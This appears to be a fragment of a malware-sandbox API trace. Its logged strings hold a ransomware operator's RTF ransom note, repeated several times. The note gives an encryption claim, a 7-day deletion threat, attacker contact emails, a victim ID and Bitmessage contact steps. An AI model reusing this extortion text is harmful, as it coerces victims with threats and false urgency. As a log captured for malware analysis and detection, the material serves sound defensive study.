COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.197] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.197] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 